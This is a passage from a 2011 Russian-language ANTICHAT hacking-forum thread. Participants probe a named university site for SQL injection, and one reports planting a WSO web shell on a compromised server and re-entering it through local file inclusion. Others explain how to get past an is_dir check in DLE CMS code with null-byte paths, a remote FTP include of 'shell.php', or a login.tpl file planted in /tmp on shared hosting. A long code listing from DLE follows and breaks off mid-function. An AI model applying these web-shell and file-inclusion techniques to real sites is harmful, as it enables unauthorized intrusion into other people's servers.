ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.07.2011, 04:26
|
|
Познающий
Регистрация: 14.03.2009
Сообщений: 38
Провел на форуме:
250929
Репутация:
2
|
|
Сообщение от expupkin
expupkin said:
Часто натыкабсь на такие ошибки , скажите есть тут уязвимость или нет ? И если есть то как её использовать ?
Код HTML:
HTML:
http://engineer.asu.edu/feed-item?page=7
скуля, раскрытие путей
|
|
|
14.07.2011, 04:36
|
|
Новичок
Регистрация: 15.01.2010
Сообщений: 7
Провел на форуме:
33140
Репутация:
0
|
|
Сообщение от erolom
erolom said:
скуля, раскрытие путей
Код HTML:
HTML:
http://engineer.asu.edu/feed-item?page=1'
Почему же так она не пашет ?
|
|
|
|
14.07.2011, 04:39
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от erolom
erolom said:
скуля, раскрытие путей
инъекции там нет. просто кривости настройки.
|
|
|
|
14.07.2011, 12:23
|
|
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199
Репутация:
127
|
|
Залил шелл wso, начинаю делать какие-либо действия на шелле (перемещение по папкам, редактирование файлов и пр.) меня выкидывает на страницу ввод пароля(( что можно сделать?
|
|
|
|
14.07.2011, 13:10
|
|
Guest
Сообщений: n/a
Провел на форуме:
42754
Репутация:
0
|
|
Сообщение от Bramin
Bramin said:
Залил шелл wso, начинаю делать какие-либо действия на шелле (перемещение по папкам, редактирование файлов и пр.) меня выкидывает на страницу ввод пароля(( что можно сделать?
Пароль убери.
|
|
|
|
14.07.2011, 14:36
|
|
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199
Репутация:
127
|
|
Сообщение от Ups
Ups said:
Пароль убери.
залить повторно шелл нет возможности, дыру прикрыли...есть еще варианты?
p.s оказалось вариант есть через локальный инклуд,
вылетов нет
|
|
|
|
14.07.2011, 17:46
|
|
Познающий
Регистрация: 20.04.2006
Сообщений: 67
Провел на форуме:
170762
Репутация:
-1
|
|
можно ли обойти проверку в is_dir
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (@[/COLOR][COLOR="#0000BB"]is_dir[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'abcd'[/COLOR][COLOR="#007700"]]) {[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'abcd'[/COLOR][COLOR="#007700"]]; }[/COLOR][/COLOR]
то есть проверку на директорию
допустим нужно задать такой путь
abcd = /home/www/sell.gif |
|
|
|
14.07.2011, 18:49
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от ysmat
ysmat said:
можно ли обойти проверку в is_dir
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if (@[/COLOR][COLOR="#0000BB"]is_dir[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'abcd'[/COLOR][COLOR="#007700"]]) {[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'abcd'[/COLOR][COLOR="#007700"]]; }[/COLOR][/COLOR]
то есть проверку на директорию
допустим нужно задать такой путь
abcd = /home/www/sell.gif Возможно.
Если строка переданная в is_dir, будет наполовину обрезана нулл-байтом, а функция в которую она будет помещена, не будет его считать(Или он после будет убираться) то возможно вставить любой путь.
Код:
Code:
/home/www/%00sell.gif
Ну и ещё один вариант:
Если переменная далее будет помещена в функцию, не добавляя к ней ничего в начале(Возможно и добавляя, зависит от кода), и добавляя префикс в конце, а функция будет наподобие той, которая работает с файлами, то возможно будет передать удалённую директорию, например по протоколу FTP:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'abcd'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#DD0000"]'ftp://10.0.0.1/'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]//-----------
[/COLOR][COLOR="#007700"]if (@[/COLOR][COLOR="#0000BB"]is_dir[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'abcd'[/COLOR][COLOR="#007700"]])
{
include([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'abcd'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]'shell.php'[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]//Возможны и другие функции, будет лучше если приведёшь полный код
//Ну разумеется на настройки php.ini тоже следует обратить внимание
[/COLOR][COLOR="#007700"]}[/COLOR][/COLOR]
Даже если в данной ситуации путь будет неизвестен, то будет возможно запрограммировать сервер что бы передавал нужный ко по любому запросу.
|
|
|
|
14.07.2011, 19:52
|
|
Познающий
Регистрация: 20.04.2006
Сообщений: 67
Провел на форуме:
170762
Репутация:
-1
|
|
продолжение кода
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#FF8000"]// усатановачный путь скрипта
[/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]dle_template[/COLOR][COLOR="#007700"]( );[/COLOR][COLOR="#FF8000"]// не совсем понимаю что это $tpl не просто переменная а обьект?
[/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]dir[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/templates/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]// какое-то хитрое обращение к нему вроде бы полность собираеться путь
[/COLOR][COLOR="#007700"]include_once[/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]dir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/login.tpl'[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]// собственно сам инклюд
[/COLOR][/COLOR]
|
|
|
|
15.07.2011, 10:01
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
Сообщение от ysmat
ysmat said:
продолжение кода
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]//-----------
[/COLOR][COLOR="#007700"]if (@[/COLOR][COLOR="#0000BB"]is_dir[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'abcd'[/COLOR][COLOR="#007700"]])
{
[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'abcd'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]dle_template[/COLOR][COLOR="#007700"]( );[/COLOR][COLOR="#FF8000"]// Создание объекта $tpl из класса dle_template.
[/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]dir[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/templates/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]// Сбор пути в одну переменную
[/COLOR][COLOR="#007700"]include_once[/COLOR][COLOR="#0000BB"]$tpl[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]dir[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/login.tpl'[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]// Ну и собственно сам инклюд
[/COLOR][COLOR="#007700"]}
[/COLOR][/COLOR]
Безнадёжная ситуация, но не совсем
1. Если у вас есть доступ у одному каталогу на сервере, и этот скрипт тоже туда имеет доступ, то можно туда залить файл login.tpl, а тут его проинклудить(Даже если там нет прав на выполнение, и файлы обрезаны .htaccess). - Это различные файлообменники, uploader'ы и т. д.
2. Зарегистрировать себе сайт на этом-же хостинге(и сервере), в каталоге /tmp или любом другом, который доступен для всех создать произвольную папку и файл login.tpl, и в переменную $_COOKIE['abcd'] подставить путь к нему, относительно данного сервера.
Но если это не весь код, а просто участки кода из DLE:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$category_skin[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$category_skin[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]totranslit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$category_skin[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) );
if ([/COLOR][COLOR="#0000BB"]$category_skin[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]AND @[/COLOR][COLOR="#0000BB"]is_dir[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/templates/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$category_skin[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'skin'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$category_skin[/COLOR][COLOR="#007700"];
}
} elseif (isset ([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'action_skin_change'[/COLOR][COLOR="#007700"]] )) {
[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'skin_name'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]totranslit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'skin_name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) );
echo[/COLOR][COLOR="#DD0000"]"!"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'skin_name'[/COLOR][COLOR="#007700"]];
if ([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'skin_name'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]AND @[/COLOR][COLOR="#0000BB"]is_dir[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/templates/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'skin_name'[/COLOR][COLOR="#007700"]] ) ) {
[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'skin'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'skin_name'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]set_cookie[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"dle_skin"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'skin_name'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]365[/COLOR][COLOR="#007700"]);
}
} elseif (isset ([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dle_skin'[/COLOR][COLOR="#007700"]] ) ) {
[/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dle_skin'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]totranslit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dle_skin'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) );
if ([/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dle_skin'[/COLOR][COLOR="#007700"]] !=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]AND @[/COLOR][COLOR="#0000BB"]is_dir[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]ROOT_DIR[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/templates/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dle_skin'[/COLOR][COLOR="#007700"]] )) {
[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'skin'[/COLOR][COLOR="#007700"]] =[/COLOR][COLOR="#0000BB"]$_COOKIE[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'dle_skin'[/COLOR][COLOR="#007700"]];
}
}[/COLOR][/COLOR]
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]totranslit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$lower[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$punkt[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]) {
global[/COLOR][COLOR="#0000BB"]$langtranslit[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]is_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"]) ) return[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
if (![/COLOR][COLOR="#0000BB"]is_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$langtranslit[/COLOR][COLOR="#007700"]) OR ![/COLOR][COLOR="#0000BB"]count[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$langtranslit[/COLOR][COLOR="#007700"]) ) {
[/COLOR][COLOR="#0000BB"]$langtranslit[/COLOR][COLOR="#007700"]= array(
[/COLOR][COLOR="#DD0000"]'а'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'a'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'б'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'b'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'в'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'v'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'г'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'g'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'д'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'d'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'е'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'e'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'ё'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'e'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'ж'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'zh'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'з'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'z'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'и'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'i'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'й'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'y'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'к'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'k'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'л'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'l'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'м'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'m'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'н'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'n'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'о'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'o'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'п'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'p'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'р'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'r'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'с'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'s'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'т'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'t'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'у'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'u'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'ф'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'f'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'х'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'h'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'ц'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'c'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'ч'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'ch'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'ш'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'sh'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'щ'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'sch'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'ь'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'ы'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'y'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'ъ'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'э'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'e'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'ю'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'yu'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'я'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'ya'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]"ї"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"yi"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"є"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"ye"[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'А'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'A'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'Б'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'B'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'В'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'V'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'Г'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'G'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'Д'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'D'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'Е'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'E'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'Ё'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'E'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'Ж'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Zh'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'З'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Z'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'И'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'I'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'Й'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Y'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'К'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'K'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'Л'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'L'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'М'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'M'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'Н'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'N'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'О'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'O'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'П'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'P'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'Р'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'R'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'С'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'S'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'Т'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'T'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'У'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'U'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'Ф'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'F'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'Х'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'H'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'Ц'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'C'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'Ч'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Ch'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'Ш'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Sh'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'Щ'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Sch'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'Ь'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'Ы'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Y'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'Ъ'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'Э'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'E'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'Ю'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Yu'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'Я'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]'Ya'[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]"Ї"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"yi"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"Є"[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#DD0000"]"ye"[/COLOR][COLOR="#007700"],
);
}
[/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]trim[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]strip_tags[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"]) );
[/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/\s+/ms"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"-"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]strtr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$var[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$langtranslit[/COLOR][COLOR="#007700"]);
